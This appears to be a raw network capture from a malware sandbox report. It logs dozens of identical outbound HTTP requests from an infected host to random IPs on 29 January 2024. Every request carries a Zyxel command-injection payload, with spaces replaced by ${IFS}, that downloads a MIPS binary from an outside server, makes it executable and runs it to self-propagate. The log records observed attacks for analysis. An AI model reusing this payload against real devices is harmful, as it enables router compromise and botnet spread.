                                              Jan 29, 2024 07:03:40.824096918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2178192.168.2.1442522170.80.220.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824153900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2179192.168.2.1440384164.131.128.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824167967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2180192.168.2.1457544190.253.216.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824213982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2181192.168.2.1435618166.13.92.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824256897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2182192.168.2.1453628175.182.174.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824289083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2183192.168.2.1433186142.250.125.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824321032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2184192.168.2.14367089.34.139.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824371099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2185192.168.2.1444684109.35.32.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824398041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2186192.168.2.1438702158.245.114.187443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824423075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2187192.168.2.1444584102.241.31.50443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824459076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2188192.168.2.1438816108.54.241.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824496031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2189192.168.2.1455142114.65.119.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824537992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2190192.168.2.1437524198.9.38.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824561119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2191192.168.2.146095684.255.19.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824609995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2192192.168.2.1457100112.47.39.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824652910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2193192.168.2.1440088194.187.69.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824688911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2194192.168.2.1455302138.151.52.42443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824707985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2195192.168.2.1435894197.66.33.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824767113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2196192.168.2.1451606125.46.81.249443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824796915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2197192.168.2.1453222142.39.171.85443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824820995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2198192.168.2.1445012148.77.250.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824851036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2199192.168.2.1446584168.187.120.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824913979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2200192.168.2.1439898184.15.197.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824939966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2201192.168.2.144362893.120.191.65443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.824975014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2202192.168.2.143656461.102.245.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825006008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2203192.168.2.145248412.148.44.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825057983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2204192.168.2.1459672131.242.199.19443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825088978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2205192.168.2.146089049.200.102.174443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825114012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2206192.168.2.1435774199.7.60.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825169086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2207192.168.2.1441526198.30.134.83443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825201988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2208192.168.2.144939685.35.147.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825242043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2209192.168.2.145358424.44.169.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825269938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2210192.168.2.1446734145.16.38.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825304031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2211192.168.2.1451868120.15.222.120443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825320959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2212192.168.2.14554049.227.68.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825365067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2213192.168.2.1450428162.158.207.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825418949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2214192.168.2.1455124156.130.217.123443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825439930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2215192.168.2.1458892136.138.84.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825474024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2216192.168.2.143383463.110.145.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825536013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2217192.168.2.146049687.173.51.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825606108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2218192.168.2.145692639.240.219.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825654984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2219192.168.2.1441972125.227.118.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825675011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2220192.168.2.143842231.12.155.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825731039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2221192.168.2.1459410106.6.158.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825763941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2222192.168.2.1443730148.240.235.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825804949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2223192.168.2.143878262.35.13.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825845957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2224192.168.2.1445360137.89.145.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825871944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2225192.168.2.146098069.218.193.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825910091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2226192.168.2.1450130101.182.79.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825949907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2227192.168.2.1444564148.54.109.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.825959921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2228192.168.2.145213825.83.254.153443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826014042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2229192.168.2.1446790178.47.201.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826049089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2230192.168.2.1457310192.207.244.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826075077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2231192.168.2.1458678107.150.34.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826138020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2232192.168.2.1446246195.12.126.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826165915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2233192.168.2.1436622129.79.23.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826200962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2234192.168.2.144915849.179.118.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826252937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2235192.168.2.1442500140.235.74.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826287985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2236192.168.2.1450112114.237.141.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826312065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2237192.168.2.143915018.40.197.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826338053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2238192.168.2.1459660150.14.113.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826386929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2239192.168.2.144795040.244.228.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826416016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2240192.168.2.1440428180.215.201.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:40.826462030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              2241192.168.2.144593088.134.23.180443
                                              TimestampBytes transferredDirectionData
